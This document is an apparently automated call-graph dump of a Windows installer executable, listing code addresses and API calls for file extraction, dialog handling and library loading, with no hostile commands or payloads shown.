3694->3730 3695->3694 3698 40343e 3698->3519 3701 40347e 46 API calls 3702 4033d8 3701->3702 3702->3698 3703 403444 ReadFile 3702->3703 3705 4033e7 3702->3705 3703->3698 3705->3698 3706 4061f5 ReadFile 3705->3706 3745 406224 WriteFile 3705->3745 3706->3705 3709 4061f5 ReadFile 3708->3709 3710 4035fa 3709->3710 3710->3518 3711->3508 3713 406acf PeekMessageW 3712->3713 3714 406ac5 DispatchMessageW 3713->3714 3715 406adf 3713->3715 3714->3713 3715->3683 3717 403026 3716->3717 3718 403028 MulDiv 3716->3718 3717->3718 3718->3689 3720 405722 3719->3720 3729 4030ad 3719->3729 3721 40573e lstrlenW 3720->3721 3722 4066bf 21 API calls 3720->3722 3723 405767 3721->3723 3724 40574c lstrlenW 3721->3724 3722->3721 3726 40577a 3723->3726 3727 40576d SetWindowTextW 3723->3727 3725 40575e lstrcatW 3724->3725 3724->3729 3725->3723 3728 405780 SendMessageW SendMessageW SendMessageW 3726->3728 3726->3729 3727->3726 3728->3729 3729->3683 3731 4035d6 3730->3731 3732 4034ac 3730->3732 3734 403033 36 API calls 3731->3734 3747 4035fd SetFilePointer 3732->3747 3735 4033a8 3734->3735 3735->3698 3743 4061f5 ReadFile 3735->3743 3736 4034b7 SetFilePointer 3741 4034dc 3736->3741 3737 4035e7 ReadFile 3737->3741 3739 403033 36 API calls 3739->3741 3740 406224 WriteFile 3740->3741 3741->3735 3741->3737 3741->3739 3741->3740 3742 4035b7 SetFilePointer 3741->3742 3748 406bf1 3741->3748 3742->3731 3744 4033c1 3743->3744 3744->3698 3744->3701 3746 406242 3745->3746 3746->3705 3747->3736 3749 406c16 3748->3749 3750 406c1e 3748->3750 3749->3741 3750->3749 3751 406ca5 GlobalFree 3750->3751 3752 406cae GlobalAlloc 3750->3752 3753 406d25 GlobalAlloc 3750->3753 3754 406d1c GlobalFree 3750->3754 3751->3752 3752->3749 3752->3750 3753->3749 3753->3750 3754->3753 3756 40403e 3755->3756 3772 4065c9 wsprintfW 3756->3772 3758 4040af 3759 4040e3 22 API calls 3758->3759 3761 4040b4 3759->3761 3760 403ddf 3760->3533 3761->3760 3762 4066bf 21 API calls 3761->3762 3762->3761 3764 40464d SendMessageW 3763->3764 3769 4057fd 3764->3769 3765 405824 3766 40464d SendMessageW 3765->3766 3767 405836 OleUninitialize 3766->3767 3767->3564 3768 401389 2 API calls 3768->3769 3769->3765 3769->3768 3770->3529 3771->3535 3772->3758 3773->3579 3775 406019 3774->3775 3779 40602b 3774->3779 3777 406026 CharNextW 3775->3777 3775->3779 3776 40604f 3776->3582 3776->3583 3777->3776 3778 405f7e CharNextW 3778->3779 3779->3776 3779->3778 3780->3611 3781->3622 3790 40614d GetFileAttributesW 3782->3790 3785 405d61 RemoveDirectoryW 3788 405d6f 3785->3788 3786 405d69 DeleteFileW 3786->3788 3787 405d73 3787->3622 3788->3787 3789 405d7f SetFileAttributesW 3788->3789 3789->3787 3791 405d52 3790->3791 3792 40615f SetFileAttributesW 3790->3792 3791->3785 3791->3786 3791->3787 3792->3791 3794 4062f8 3793->3794 3795 40631e GetShortPathNameW 3793->3795 3820 406172 GetFileAttributesW CreateFileW 3794->3820 3797 406333 3795->3797 3798 40643d 3795->3798 3797->3798 3799 40633b wsprintfA 3797->3799 3798->3641 3801 4066bf 21 API calls 3799->3801 3800 406302 CloseHandle GetShortPathNameW 3800->3798 3802 406316 3800->3802 3803 406363 3801->3803 3802->3795 3802->3798 3821 406172 GetFileAttributesW CreateFileW 3803->3821 3805 406370 3805->3798 3806 40637f GetFileSize GlobalAlloc 3805->3806 3807 4063a1 3806->3807 3808 406436 CloseHandle 3806->3808 3809 4061f5 ReadFile 3807->3809 3808->3798 3810 4063a9 3809->3810 3810->3808 3822 4060d7 lstrlenA 3810->3822 3813 4063c0 lstrcpyA 3816 4063e2 3813->3816 3814 4063d4 3815 4060d7 4 API calls 3814->3815 3815->3816 3817 406419 SetFilePointer 3816->3817 3818 406224 WriteFile 3817->3818 3819 40642f GlobalFree 3818->3819 3819->3808 3820->3800 3821->3805 3823 406118 lstrlenA 3822->3823 3824 406120 3823->3824 3825 4060f1 lstrcmpiA 3823->3825 3824->3813 3824->3814 3825->3824 3826 40610f CharNextA 3825->3826 3826->3823 3828 403ccd 3827->3828 3829 403c96 3828->3829 3830 403cd2 FreeLibrary GlobalFree 3828->3830 3829->3657 3830->3829 3830->3830 3831 4015c6 3851 402dab 3831->3851 3834 405ffc 4 API calls 3835 4015d6 3834->3835 3836 401636 3835->3836 3837 405f7e CharNextW 3835->3837 3844 405c30 2 API calls 3835->3844 3845 405c4d 5 API calls 3835->3845 3848 4015ff 3835->3848 3849 40161c GetFileAttributesW 3835->3849 3838 401668 3836->3838 3839 40163b 3836->3839 3837->3835 3842 401423 28 API calls 3838->3842 3857 401423 3839->3857 3847 401660 3842->3847 3844->3835 3845->3835 3846 40164f SetCurrentDirectoryW 3846->3847 3848->3835 3850 405bd6 2 API calls 3848->3850 3849->3835 3850->3848 3852 402db7 3851->3852 3853 4066bf 21 API calls 3852->3853 3854 402dd8 3853->3854 3855 4015cd 3854->3855 3856 406930 5 API calls 3854->3856 3855->3834 3856->3855 3858 405707 28 API calls 3857->3858 3859 401431 3858->3859 3860 406682 lstrcpynW 3859->3860 3860->3846 3861 405846 3862 4059f0 3861->3862 3863 405867 GetDlgItem GetDlgItem GetDlgItem 3861->3863 3865 405a21 3862->3865 3866 4059f9 GetDlgItem CreateThread FindCloseChangeNotification 3862->3866 3906 404636 SendMessageW 3863->3906 3868 405a71 3865->3868 3869 405a38 ShowWindow ShowWindow 3865->3869 3870 405a4c 3865->3870 3866->3865 3909 4057da 5 API calls 3866->3909 3867 4058d7 3872 4058de GetClientRect GetSystemMetrics SendMessageW SendMessageW 3867->3872 3876 404668 8 API calls 3868->3876 3908 404636 SendMessageW 3869->3908 3871 405aac 3870->3871 3874 405a60 3870->3874 3875 405a86 ShowWindow 3870->3875 3871->3868 3879 405aba SendMessageW 3871->3879 3877 405930 SendMessageW SendMessageW 3872->3877 3878 40594c 3872->3878 3880 4045da SendMessageW 3874->3880 3882 405aa6 3875->3882 3883 405a98 3875->3883 3881 405a7f 3876->3881 3877->3878 3884 405951 SendMessageW 3878->3884 3885 40595f 3878->3885 3879->3881 3886 405ad3 CreatePopupMenu 3879->3886 3880->3868 3888 4045da SendMessageW 3882->3888 3887 405707 28 API calls 3883->3887 3884->3885 3890 404601 22 API calls 3885->3890 3889 4066bf 21 API calls 3886->3889 3887->3882 3888->3871 3891 405ae3 AppendMenuW 3889->3891 3892 40596f 3890->3892 3893 405b00 GetWindowRect 3891->3893 3894 405b13 TrackPopupMenu 3891->3894 3895 405978 ShowWindow 3892->3895 3896 4059ac GetDlgItem SendMessageW 3892->3896 3893->3894 3894->3881 3897 405b2e 3894->3897 3898 40599b 3895->3898 3899 40598e ShowWindow 3895->3899 3896->3881 3900 4059d3 SendMessageW SendMessageW 3896->3900 3901 405b4a SendMessageW 3897->3901 3907 404636 SendMessageW 3898->3907 3899->3898 3900->3881 3901->3901 3902 405b67 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3901->3902 3904 405b8c SendMessageW 3902->3904 3904->3904 3905 405bb5 GlobalUnlock SetClipboardData CloseClipboard 3904->3905 3905->3881 3906->3867 3907->3896 3908->3870 4097 404e48 4098 404e74 4097->4098 4099 404e58 4097->4099 4101 404ea7 4098->4101 4102 404e7a SHGetPathFromIDListW 4098->4102 4108 405cc6 GetDlgItemTextW 4099->4108 4104 404e91 SendMessageW 4102->4104 4105 404e8a 4102->4105 4103 404e65 SendMessageW 4103->4098 4104->4101 4106 40140b 2 API calls 4105->4106 4106->4104 4108->4103 4109 401c48 4110 402d89 21 API calls 4109->4110 4111 401c4f 4110->4111 4112 402d89 21 API calls 4111->4112 4113 401c5c 4112->4113 4114 401c71 4113->4114 4115 402dab 21 API calls 4113->4115 4116 401c81 4114->4116 4117 402dab 21 API calls 4114->4117 4115->4114 4118 401cd8 4116->4118 4119 401c8c 4116->4119 4117->4116 4120 402dab 21 API calls 4118->4120 4121 402d89 21 API calls 4119->4121 4122 401cdd 4120->4122 4123 401c91 4121->4123 4125 402dab 21 API calls 4122->4125 4124 402d89 21 API calls 4123->4124 4126 401c9d 4124->4126 4127 401ce6 FindWindowExW 4125->4127 4128 401cc8 SendMessageW 4126->4128 4129 401caa SendMessageTimeoutW 4126->4129 4130 401d08 4127->4130 4128->4130 4129->4130 4131 4028c9 4132 4028cf 4131->4132 4133 4028d7 FindClose 4132->4133 4134 402c2f 4132->4134 4133->4134 4138 4016d1 4139 402dab 21 API calls 4138->4139 4140 4016d7 GetFullPathNameW 4139->4140 4141 4016f1 4140->4141 4147 401713 4140->4147 4143 4069df 2 API calls 4141->4143 4141->4147 4142 401728 GetShortPathNameW 4144 402c2f 4142->4144 4145 401703 4143->4145 4145->4147 4148 406682 lstrcpynW 4145->4148 4147->4142 4147->4144 4148->4147 4149 401e53 GetDC 4150 402d89 21 API calls 4149->4150 4151 401e65 GetDeviceCaps MulDiv ReleaseDC 4150->4151 4152 402d89 21 API calls 4151->4152 4153 401e96 4152->4153 4154 4066bf 21 API calls 4153->4154 4155 401ed3 CreateFontIndirectW 4154->4155 4156 40263d 4155->4156 4157 402955 4158 402dab 21 API calls 4157->4158 4159 402961 4158->4159 4160 402977 4159->4160 4161 402dab 21 API calls 4159->4161 4162 40614d 2 API calls 4160->4162 4161->4160 4163 40297d 4162->4163 4185 406172 GetFileAttributesW CreateFileW 4163->4185 4165 40298a 4166 402a40 4165->4166 4167 4029a5 GlobalAlloc 4165->4167 4168 402a28 4165->4168 4169 402a47 DeleteFileW 4166->4169 4170 402a5a 4166->4170 4167->4168 4171 4029be 4167->4171 4172 403376 48 API calls 4168->4172 4169->4170 4186 4035fd SetFilePointer 4171->4186 4174 402a35 CloseHandle 4172->4174 4174->4166 4175 4029c4 4176 4035e7 ReadFile 4175->4176 4177 4029cd GlobalAlloc 4176->4177 4178 402a11 4177->4178 4179 4029dd 4177->4179 4180 406224 WriteFile 4178->4180 4181 403376 48 API calls 4179->4181 4182 402a1d GlobalFree 4180->4182 4184 4029ea 4181->4184 4182->4168 4183 402a08 GlobalFree 4183->4178 4184->4183 4185->4165 4186->4175 3993 4014d7 3998 402d89 3993->3998 3995 4014dd Sleep 3997 402c2f 3995->3997 3999 4066bf 21 API calls 3998->3999 4000 402d9e 3999->4000 4000->3995 4201 40195b 4202 402dab 21 API calls 4201->4202 4203 401962 lstrlenW 4202->4203 4204 40263d 4203->4204 4212 4020dd 4213 4020ef 4212->4213 4214 4021a1 4212->4214 4215 402dab 21 API calls 4213->4215 4216 401423 28 API calls 4214->4216 4217 4020f6 4215->4217 4222 4022fb 4216->4222 4218 402dab 21 API calls 4217->4218 4219 4020ff 4218->4219 4220 402115 LoadLibraryExW 4219->4220 4221 402107 GetModuleHandleW 4219->4221 4220->4214 4223 402126 4220->4223 4221->4220 4221->4223 4232 406ae5 4223->4232 4226 402170 4228 405707 28 API calls 4226->4228 4227 402137 4229 401423 28 API calls 4227->4229 4230 402147 4227->4230 4228->4230 4229->4230 4230->4222 4231 402193 FreeLibrary 4230->4231 4231->4222 4237 4066a4 WideCharToMultiByte 4232->4237 4234 406b02 4235 406b09 GetProcAddress 4234->4235 4236 402131 4234->4236 4235->4236 4236->4226 4236->4227 4237->4234 4238 402b5e 4239 402bb0 4238->4239 4240 402b65 4238->4240 4241 406a76 5 API calls 4239->4241 4243 402d89 21 API calls 4240->4243 4244 402bae 4240->4244 4242 402bb7 4241->4242 4245 402dab 21 API calls 4242->4245 4246 402b73 4243->4246 4247 402bc0 4245->4247 4248 402d89 21 API calls 4246->4248 4247->4244 4249 402bc4 IIDFromString 4247->4249 4251 402b7f 4248->4251 4249->4244 4250 402bd3 4249->4250 4250->4244 4256 406682 lstrcpynW 4250->4256 4255 4065c9 wsprintfW 4251->4255 4253 402bf0 CoTaskMemFree 4253->4244 4255->4244 4256->4253 4257 402a60 4258 402d89 21 API calls 4257->4258 4259 402a66 4258->4259 4260 402aa9 4259->4260 4261 402a8d 4259->4261 4269 402933 4259->4269 4262 402ac3 4260->4262 4263 402ab3 4260->4263 4264 402a92 4261->4264 4265 402aa3 4261->4265 4267 4066bf 21 API calls 4262->4267 4266 402d89 21 API calls 4263->4266 4271 406682 lstrcpynW 4264->4271 4265->4269 4272 4065c9 wsprintfW 4265->4272 4266->4265 4267->4265 4271->4269 4272->4269 4273 401761 4274 402dab 21 API calls 4273->4274 4275 401768 4274->4275 4276 4061a1 2 API calls 4275->4276 4277 40176f 4276->4277 4277->4277 4278 401d62 4279 402d89 21 API calls 4278->4279 4280 401d73 SetWindowLongW 4279->4280 4281 402c2f 4280->4281 4282 4028e3 4283 4028eb 4282->4283 4284 4028ef FindNextFileW 4283->4284 4286 402901 4283->4286 4285 402948 4284->4285 4284->4286 4288 406682 lstrcpynW 4285->4288 4288->4286 4289 401568 4290 402ba9 4289->4290 4293 4065c9 wsprintfW 4290->4293 4292 402bae 4293->4292 4301 40196d 4302 402d89 21 API calls 4301->4302 4303 401974 4302->4303 4304 402d89 21 API calls 4303->4304 4305 401981 4304->4305 4306 402dab 21 API calls 4305->4306 4307 401998 lstrlenW 4306->4307 4309 4019a9 4307->4309 4308 4019ea 4309->4308 4313 406682 lstrcpynW 4309->4313 4311 4019da 4311->4308 4312 4019df lstrlenW 4311->4312 4312->4308 4313->4311 4314 40506e GetDlgItem GetDlgItem 4315 4050c0 7 API calls 4314->4315 4327 4052e5 4314->4327 4316 405167 DeleteObject 4315->4316 4317 40515a SendMessageW 4315->4317 4318 405170 4316->4318 4317->4316 4320 4051a7 4318->4320 4322 4066bf 21 API calls 4318->4322 4319 4053c7 4321 405473 4319->4321 4330 405420 SendMessageW 4319->4330 4353 4052d8 4319->4353 4323 404601 22 API calls 4320->4323 4325 405485 4321->4325 4326 40547d SendMessageW 4321->4326 4328 405189 SendMessageW SendMessageW 4322->4328 4324 4051bb 4323->4324 4329 404601 22 API calls 4324->4329 4333 4054ae 4325->4333 4339 405497 ImageList_Destroy 4325->4339 4340 40549e 4325->4340 4326->4325 4327->4319 4357 405354 4327->4357 4368 404fbc SendMessageW 4327->4368 4328->4318 4335 4051cc 4329->4335 4337 405435 SendMessageW 4330->4337 4330->4353 4331 4053b9 SendMessageW 4331->4319 4332 404668 8 API calls 4338 405674 4332->4338 4336 405628 4333->4336 4361 4054e9 4333->4361 4373 40503c 4333->4373 4342 4052a7 GetWindowLongW SetWindowLongW 4335->4342 4349 40521f SendMessageW 4335->4349 4351 4052a2 4335->4351 4354 405271 SendMessageW 4335->4354 4355 40525d SendMessageW 4335->4355 4343 40563a ShowWindow GetDlgItem ShowWindow 4336->4343 4336->4353 4345 405448 4337->4345 4339->4340 4340->4333 4341 4054a7 GlobalFree 4340->4341 4341->4333 4344 4052c0 4342->4344 4343->4353 4346 4052c5 ShowWindow 4344->4346 4347 4052dd 4344->4347 4350 405459 SendMessageW 4345->4350 4366 404636 SendMessageW 4346->4366 4367 404636 SendMessageW 4347->4367 4349->4335 4350->4321 4351->4342 4351->4344 4353->4332 4354->4335 4355->4335 4357->4319 4357->4331 4358 4055f3 4359 4055fe InvalidateRect 4358->4359 4362 40560a 4358->4362 4359->4362 4360 405517 SendMessageW 4365 40552d 4360->4365 4361->4360 4361->4365 4362->4336 4382 404f77 4362->4382 4364 4055a1 SendMessageW SendMessageW 4364->4365 4365->4358 4365->4364 4366->4353 4367->4327 4369 40501b SendMessageW 4368->4369 4370 404fdf GetMessagePos ScreenToClient SendMessageW 4368->4370 4371 405013 4369->4371 4370->4371 4372 405018 4370->4372 4371->4357 4372->4369 4385 406682 lstrcpynW 4373->4385 4375 40504f 4386 4065c9 wsprintfW 4375->4386 4377 405059 4378 40140b 2 API calls 4377->4378 4379 405062 4378->4379 4387 406682 lstrcpynW 4379->4387 4381 405069 4381->4361 4388 404eae 4382->4388 4384 404f8c 4384->4336 4385->4375 4386->4377 4387->4381 4389 404ec7 4388->4389 4390 4066bf 21 API calls 4389->4390 4391 404f2b 4390->4391 4392 4066bf 21 API calls 4391->4392 4393 404f36 4392->4393 4394 4066bf 21 API calls 4393->4394 4395 404f4c lstrlenW wsprintfW SetDlgItemTextW 4394->4395 4395->4384 4396 40166f 4397 402dab 21 API calls 4396->4397 4398 401675 4397->4398 4399 4069df 2 API calls 4398->4399 4400 40167b 4399->4400 4401 402af0 4402 402d89 21 API calls 4401->4402 4403 402af6 4402->4403 4404 402933 4403->4404 4405 4066bf 21 API calls 4403->4405 4405->4404 4406 404771 lstrlenW 4407 404790 4406->4407 4408 404792 WideCharToMultiByte 4406->4408 4407->4408 4409 4026f1 4410 402d89 21 API calls 4409->4410 4418 402700 4410->4418 4411 40283d 4412 40274a ReadFile 4412->4411 4412->4418 4413 4061f5 ReadFile 4413->4418 4414 40278a MultiByteToWideChar 4414->4418 4415 40283f 4422 4065c9 wsprintfW 4415->4422 4416 406253 5 API calls 4416->4418 4418->4411 4418->4412 4418->4413 4418->4414 4418->4415 4418->4416 4419 4027b0 SetFilePointer MultiByteToWideChar 4418->4419 4420 402850 4418->4420 4419->4418 4420->4411 4421 402871 SetFilePointer 4420->4421 4421->4411 4422->4411 4423 404af2 4424 404b1e 4423->4424 4425 404b2f 4423->4425 4484 405cc6 GetDlgItemTextW 4424->4484 4427 404b3b GetDlgItem 4425->4427 4433 404b9a 4425->4433 4429 404b4f 4427->4429 4428 404b29 4431 406930 5 API calls 4428->4431 4432 404b63 SetWindowTextW 4429->4432 4437 405ffc 4 API calls 4429->4437 4430 404c7e 4434 404e2d 4430->4434 4486 405cc6 GetDlgItemTextW 4430->4486 4431->4425 4438 404601 22 API calls 4432->4438 4433->4430 4433->4434 4439 4066bf 21 API calls 4433->4439 4436 404668 8 API calls 4434->4436 4444 404e41 4436->4444 4445 404b59 4437->4445 4441 404b7f 4438->4441 4442 404c0e SHBrowseForFolderW 4439->4442 4440 404cae 4443 406059 18 API calls 4440->4443 4446 404601 22 API calls 4441->4446 4442->4430 4447 404c26 CoTaskMemFree 4442->4447 4448 404cb4 4443->4448 4445->4432 4451 405f51 3 API calls 4445->4451 4449 404b8d 4446->4449 4450 405f51 3 API calls 4447->4450 4487 406682 lstrcpynW 4448->4487 4485 404636 SendMessageW 4449->4485 4453 404c33 4450->4453 4451->4432 4456 404c6a SetDlgItemTextW 4453->4456 4460 4066bf 21 API calls 4453->4460 4455 404b93 4458 406a76 5 API calls 4455->4458 4456->4430 4457 404ccb 4459 406a76 5 API calls 4457->4459 4458->4433 4467 404cd2 4459->4467 4461 404c52 lstrcmpiW 4460->4461 4461->4456 4464 404c63 lstrcatW 4461->4464 4462 404d13 4488 406682 lstrcpynW 4462->4488 4464->4456 4465 404d1a 4466 405ffc 4 API calls 4465->4466 4468 404d20 GetDiskFreeSpaceW 4466->4468 4467->4462 4471 405f9d 2 API calls 4467->4471 4473 404d6b 4467->4473 4470 404d44 MulDiv 4468->4470 4468->4473 4470->4473 4471->4467 4472 404ddc 4475 404dff 4472->4475 4477 40140b 2 API calls 4472->4477 4473->4472 4474 404f77 24 API calls 4473->4474 4476 404dc9 4474->4476 4489 404623 KiUserCallbackDispatcher 4475->4489 4479 404dde SetDlgItemTextW 4476->4479 4480 404dce 4476->4480 4477->4475 4479->4472 4482 404eae 24 API calls 4480->4482 4481 404e1b 4481->4434 4483 404a4b SendMessageW 4481->4483 4482->4472 4483->4434 4484->4428 4485->4455 4486->4440 4487->4457 4488->4465 4489->4481 3952 401774 3953 402dab 21 API calls 3952->3953 3954 40177b 3953->3954 3955 4017a3 3954->3955 3956 40179b 3954->3956 3992 406682 lstrcpynW 3955->3992 3991 406682 lstrcpynW 3956->3991 3959 4017a1 3963 406930 5 API calls 3959->3963 3960 4017ae 3961 405f51 3 API calls 3960->3961 3962 4017b4 lstrcatW 3961->3962 3962->3959 3977 4017c0 3963->3977 3964 4069df 2 API calls 3964->3977 3965 40614d 2 API calls 3965->3977 3967 4017d2 CompareFileTime 3967->3977 3968 401892 3969 405707 28 API calls 3968->3969 3972 40189c 3969->3972 3970 405707 28 API calls 3973 40187e 3970->3973 3971 406682 lstrcpynW 3971->3977 3974 403376 48 API calls 3972->3974 3975 4018af 3974->3975 3976 4018c3 SetFileTime 3975->3976 3978 4018d5 FindCloseChangeNotification 3975->3978 3976->3978 3977->3964 3977->3965 3977->3967 3977->3968 3977->3971 3979 4066bf 21 API calls 3977->3979 3985 405ce2 MessageBoxIndirectW 3977->3985 3988 401869 3977->3988 3990 406172 GetFileAttributesW CreateFileW 3977->3990 3978->3973 3980 4018e6 3978->3980 3979->3977 3981 4018eb 3980->3981 3982 4018fe 3980->3982 3983 4066bf 21 API calls 3981->3983 3984 4066bf 21 API calls 3982->3984 3986 4018f3 lstrcatW 3983->3986 3987 401906 3984->3987 3985->3977 3986->3987 3989 405ce2 MessageBoxIndirectW 3987->3989 3988->3970 3988->3973 3989->3973 3990->3977 3991->3959 3992->3960 4490 4014f5 SetForegroundWindow 4491 402c2f 4490->4491 4492 401a77 4493 402d89 21 API calls 4492->4493 4494 401a80 4493->4494 4495 402d89 21 API calls 4494->4495 4496 401a25 4495->4496 4011 401578 4012 401591 4011->4012 4013 401588 ShowWindow 4011->4013 4014 402c2f 4012->4014 4015 40159f ShowWindow 4012->4015 4013->4012 4015->4014 4016 4023f9 4017 402dab 21 API calls 4016->4017 4018 402408 4017->4018 4019 402dab 21 API calls 4018->4019 4020 402411 4019->4020 4021 402dab 21 API calls 4020->4021 4022 40241b GetPrivateProfileStringW 4021->4022 4497 40567b 4498 40568b 4497->4498 4499 40569f 4497->4499 4501 405691 4498->4501 4502 4056e8 4498->4502 4500 4056a7 IsWindowVisible 4499->4500 4508 4056be 4499->4508 4500->4502 4503 4056b4 4500->4503 4505 40464d SendMessageW 4501->4505 4504 4056ed CallWindowProcW 4502->4504 4506 404fbc 5 API calls 4503->4506 4507 40569b 4504->4507 4505->4507 4506->4508 4508->4504 4509 40503c 4 API calls 4508->4509 4509->4502 4510 401ffb 4511 402dab 21 API calls 4510->4511 4512 402002 4511->4512 4513 4069df 2 API calls 4512->4513 4514 402008 4513->4514 4516 402019 4514->4516 4517 4065c9 wsprintfW 4514->4517 4517->4516 4518 401b7c 4519 402dab 21 API calls 4518->4519 4520 401b83 4519->4520 4521 402d89 21 API calls 4520->4521 4522 401b8c wsprintfW 4521->4522 4523 402c2f 4522->4523 4524 401000 4525 401037 BeginPaint GetClientRect 4524->4525 4526 40100c DefWindowProcW 4524->4526 4528 4010f3 4525->4528 4529 401179 4526->4529 4530 401073 CreateBrushIndirect FillRect DeleteObject 4528->4530 4531 4010fc 4528->4531 4530->4528 4532 401102 CreateFontIndirectW 4531->4532 4533 401167 EndPaint 4531->4533 4532->4533 4534 401112 6 API calls 4532->4534 4533->4529 4534->4533 4535 401680 4536 402dab 21 API calls 4535->4536 4537 401687 4536->4537 4538 402dab 21 API calls 4537->4538 4539 401690 4538->4539 4540 402dab 21 API calls 4539->4540 4541 401699 MoveFileW 4540->4541 4542 4016a5 4541->4542 4543 4016ac 4541->4543 4545 401423 28 API calls 4542->4545 4544 4069df 2 API calls 4543->4544 4547 4022fb 4543->4547 4546 4016bb 4544->4546 4545->4547 4546->4547 4548 406442 40 API calls 4546->4548 4548->4542 3230 404102 3231 40411a 3230->3231 3232 40427b 3230->3232 3231->3232 3233 404126 3231->3233 3234 4042cc 3232->3234 3235 40428c GetDlgItem GetDlgItem 3232->3235 3237 404131 SetWindowPos 3233->3237 3238 404144 3233->3238 3236 404326 3234->3236 3244 401389 2 API calls 3234->3244 3239 404601 22 API calls 3235->3239 3257 404276 3236->3257 3303 40464d 3236->3303 3237->3238 3241 40414d ShowWindow 3238->3241 3242 40418f 3238->3242 3243 4042b6 SetClassLongW 3239->3243 3245 404268 3241->3245 3246 40416d GetWindowLongW 3241->3246 3247 404197 DestroyWindow 3242->3247 3248 4041ae 3242->3248 3249 40140b 2 API calls 3243->3249 3252 4042fe 3244->3252 3342 404668 3245->3342 3246->3245 3254 404186 ShowWindow 3246->3254 3302 40458a 3247->3302 3250 4041b3 SetWindowLongW 3248->3250 3251 4041c4 3248->3251 3249->3234 3250->3257 3251->3245 3255 4041d0 GetDlgItem 3251->3255 3252->3236 3256 404302 SendMessageW 3252->3256 3254->3242 3260 4041e1 SendMessageW IsWindowEnabled 3255->3260 3261 4041fe 3255->3261 3256->3257 3258 40140b 2 API calls 3269 404338 3258->3269 3259 40458c DestroyWindow EndDialog 3259->3302 3260->3257 3260->3261 3264 40420b 3261->3264 3266 404252 SendMessageW 3261->3266 3267 40421e 3261->3267 3276 404203 3261->3276 3262 4045bb ShowWindow 3262->3257 3264->3266 3264->3276 3266->3245 3270 404226 3267->3270 3271 40423b 3267->3271 3268 404239 3268->3245 3269->3257 3269->3258 3269->3259 3272 404601 22 API calls 3269->3272 3293 4044cc DestroyWindow 3269->3293 3306 4066bf 3269->3306 3323 404601 3269->3323 3336 40140b 3270->3336 3273 40140b 2 API calls 3271->3273 3272->3269 3275 404242 3273->3275 3275->3245 3275->3276 3339 4045da 3276->3339 3278 4043b3 GetDlgItem 3279 4043d0 ShowWindow KiUserCallbackDispatcher 3278->3279 3280 4043c8 3278->3280 3326 404623 KiUserCallbackDispatcher 3279->3326 3280->3279 3282 4043fa EnableWindow 3287 40440e 3282->3287 3283 404413 GetSystemMenu EnableMenuItem SendMessageW 3284 404443 SendMessageW 3283->3284 3283->3287 3284->3287 3287->3283 3327 404636 SendMessageW 3287->3327 3328 4040e3 3287->3328 3331 406682 lstrcpynW 3287->3331 3289 404472 lstrlenW 3290 4066bf 21 API calls 3289->3290 3291 404488 SetWindowTextW 3290->3291 3332 401389 3291->3332 3294 4044e6 CreateDialogParamW 3293->3294 3293->3302 3295 404519 3294->3295 3294->3302 3296 404601 22 API calls 3295->3296 3297 404524 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3296->3297 3298 401389 2 API calls 3297->3298 3299 40456a 3298->3299 3299->3257 3300 404572 ShowWindow 3299->3300 3301 40464d SendMessageW 3300->3301 3301->3302 3302->3257 3302->3262 3304 404665 3303->3304 3305 404656 SendMessageW 3303->3305 3304->3269 3305->3304 3321 4066ca 3306->3321 3307 406911 3308 40692a 3307->3308 3378 406682 lstrcpynW 3307->3378 3308->3269 3310 4068e2 lstrlenW 3310->3321 3314 4067db GetSystemDirectoryW 3314->3321 3315 4066bf 15 API calls 3315->3310 3316 4067f1 GetWindowsDirectoryW 3316->3321 3318 4066bf 15 API calls 3318->3321 3319 406883 lstrcatW 3319->3321 3321->3307 3321->3310 3321->3314 3321->3315 3321->3316 3321->3318 3321->3319 3322 406853 SHGetPathFromIDListW CoTaskMemFree 3321->3322 3356 406550 3321->3356 3361 406a76 GetModuleHandleA 3321->3361 3367 406930 3321->3367 3376 4065c9 wsprintfW 3321->3376 3377 406682 lstrcpynW 3321->3377 3322->3321 3324 4066bf 21 API calls 3323->3324 3325 40460c SetDlgItemTextW 3324->3325 3325->3278 3326->3282 3327->3287 3329 4066bf 21 API calls 3328->3329 3330 4040f1 SetWindowTextW 3329->3330 3330->3287 3331->3289 3334 401390 3332->3334 3333 4013fe 3333->3269 3334->3333 3335 4013cb MulDiv SendMessageW 3334->3335 3335->3334 3337 401389 2 API calls 3336->3337 3338 401420 3337->3338 3338->3276 3340 4045e1 3339->3340 3341 4045e7 SendMessageW 3339->3341 3340->3341 3341->3268 3343 40472b 3342->3343 3344 404680 GetWindowLongW 3342->3344 3343->3257 3344->3343 3345 404695 3344->3345 3345->3343 3346 4046c2 GetSysColor 3345->3346 3347 4046c5 3345->3347 3346->3347 3348 4046d5 SetBkMode 3347->3348 3349 4046cb SetTextColor 3347->3349 3350 4046f3 3348->3350 3351 4046ed GetSysColor 3348->3351 3349->3348 3352 4046fa SetBkColor 3350->3352 3353 404704 3350->3353 3351->3350 3352->3353 3353->3343 3354 404717 DeleteObject 3353->3354 3355 40471e CreateBrushIndirect 3353->3355 3354->3355 3355->3343 3379 4064ef 3356->3379 3359 4065b4 3359->3321 3360 406584 RegQueryValueExW RegCloseKey 3360->3359 3362 406a92 3361->3362 3363 406a9c GetProcAddress 3361->3363 3383 406a06 GetSystemDirectoryW 3362->3383 3365 406aab 3363->3365 3365->3321 3366 406a98 3366->3363 3366->3365 3368 40693d 3367->3368 3370 4069a6 CharNextW 3368->3370 3371 4069b3 3368->3371 3374 406992 CharNextW 3368->3374 3375 4069a1 CharNextW 3368->3375 3386 405f7e 3368->3386 3369 4069b8 CharPrevW 3369->3371 3370->3368 3370->3371 3371->3369 3372 4069d9 3371->3372 3372->3321 3374->3368 3375->3370 3376->3321 3377->3321 3378->3308 3380 4064fe 3379->3380 3381 406507 RegOpenKeyExW 3380->3381 3382 406502 3380->3382 3381->3382 3382->3359 3382->3360 3384 406a28 wsprintfW LoadLibraryExW 3383->3384 3384->3366 3387 405f84 3386->3387 3388 405f9a 3387->3388 3389 405f8b CharNextW 3387->3389 3388->3368 3389->3387 4549 401503 4550 401508 4549->4550 4552 401520 4549->4552 4551 402d89 21 API calls 4550->4551 4551->4552 4553 401a04 4554 402dab 21 API calls 4553->4554 4555 401a0b 4554->4555 4556 402dab 21 API calls 4555->4556 4557 401a14 4556->4557 4558 401a1b lstrcmpiW 4557->4558 4559 401a2d lstrcmpW 4557->4559 4560 401a21 4558->4560 4559->4560 4561 402304 4562 402dab 21 API calls 4561->4562 4563 40230a 4562->4563 4564 402dab 21 API calls 4563->4564 4565 402313 4564->4565 4566 402dab 21 API calls 4565->4566 4567 40231c 4566->4567 4568 4069df 2 API calls 4567->4568 4569 402325 4568->4569 4570 402336 